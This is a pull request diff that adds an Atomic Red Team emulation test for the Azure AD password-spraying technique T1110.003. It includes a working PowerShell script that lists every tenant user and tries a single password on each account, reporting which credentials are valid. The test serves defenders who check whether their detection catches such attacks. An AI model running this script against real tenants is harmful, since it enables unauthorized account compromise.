Merge pull request #1483 from AlsidOfficial/pr-passwordspraying-azure

T1110.003 azureadaccounts

atomics/T1110.003/T1110.003.yaml

@@ -106,3 +106,59 @@ atomic_tests:
         }
       }
       Write-Host "End of password spraying"
+
+- name: Password spray all Azure AD users with a single password 
+  auto_generated_guid: a8aa2d3e-1c52-4016-bc73-0f8854cfa80a
+  description: |
+    Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module.
+    Valid credentials are only needed to fetch the list of Azure AD users.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    password:
+      description: Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)
+      type: String
+      default: P@ssw0rd!
+    valid_username:
+      description: Valid username to retrieve Azure AD users. We encourage users running this atomic to add a valid microsoft account domain; for eg <valid_test_user>@<valid_ms_account.com>
+      type: String
+      default: bruce.wayne@contoso.com
+    valid_password:
+      description: Valid password to authenticate as valid_username in the <valid_ms_account>
+      type: string
+      default: iamthebatman
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AzureAD module must be installed.
+    prereq_command: |
+      if (Get-Module AzureAD) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{valid_password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{valid_username}", $Pword
+      Connect-AzureAD -Credential $Credential > $null
+
+      ($Users = Get-AzureADUser -All $true) > $null
+      Disconnect-AzureAD > $null
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+
+      $Users | Foreach-Object {
+        $user = $_.UserPrincipalName
+        $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "$user", $Pword
+        try {
+          Write-Host " [-] Attempting #{password} on account ${user}."
+          Connect-AzureAD -Credential $Credential 2>&1> $null
+          # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+          Write-Host " [!] ${user}:#{password} are valid credentials!`r`n"
+          Disconnect-AzureAD > $null
+        } catch {
+          Write-Host " [-] ${user}:#{password} invalid credentials.`r`n"
+        }
+      }
+      Write-Host "End of password spraying"